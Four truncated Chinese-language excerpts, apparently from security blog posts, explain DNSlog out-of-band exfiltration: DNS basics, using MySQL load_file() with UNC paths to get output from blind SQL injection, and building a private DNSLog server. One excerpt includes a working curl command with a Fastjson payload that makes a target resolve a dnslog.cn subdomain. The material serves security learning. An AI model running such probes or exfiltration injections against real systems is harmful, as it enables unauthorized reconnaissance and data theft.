前言最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过，所以这里做一下记录。DNSlog原理DNSDNS(DomainNameSystem)就是域名系统，负责把域名转换成IP地址；例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。DNSlogDNSlog就是DNS的日志，DNS在域名解析的时候会留下域名和解析IP的记录DNSlog外带原理DNS在解析的时候会留下日志，我们将信息放在高级域名中，传递到自己这里，然后通过读日志获取信息。所以这里跟最初的猜想基本一致，原理也就是通过DNS请求后，通过读取日志来获

一、原理DnsLog注入可以理解成是一种技巧，而不是一种攻击方式，是一种让无回显的攻击，变得有回显的方式，包括但不限于SQL盲注，下面以盲注为例，需要有盲注的基础。在解释原理之前，首先了解一下几样东西，如下：1.load_file函数Mysql数据库的load_file()函数不单可以读取本地文件，还可以通过UNC路径访问远程文件。DnsLog注入就是利用load_file()函数访问远程文件的特点，对延时盲注等无回显的注入或其他无回显的攻击带来回显。2.UNC路径UNC路径格式：//servername/sharename/directory/filenameUNC路径就是类似上面这样形式的

Fastjson的探测方式模拟使用fastjson的网站http://192.168.88.111:8090/方式一命令行curlhttp://192.168.88.111:8090/-H"Content-Type:application/json"--data'{{"@type":"java.net.URL","val":"cegkgu.dnslog.cn"}:0'识别特征：（出现则使用了Fastjson）"status":500,"error":"InternalServerError"Bp识别特征：（出现则使用了Fastjson）type=InternalServerError,stat

自实现DNSLog服务器的意义及作用：一些公共DNSLog服务可能已进入防火墙黑名单。不依赖他人服务器，增加可靠性。结合自己的漏洞扫描工具，更定制化修改和部署DNSLogAPI。达到更高的效率。附加实现DNS重绑定攻击等其他功能熟悉DNSLog底层技术原理以下将介绍DNS，理解以下概念，对我们理解DNSLog的原理并实现DNSLog非常重要。如果您已了解这部分知识，请跳过本节，直接阅读 DNSLog实现 一节。DNS基本概念DNS是一个分布式分层数据库，用于存储IP地址和其他数据，提供从域名到网络地址的查询服务。DNS目录存储在全球范围内分布的域名服务器上，并会定期更新。DNS记录类型记录是D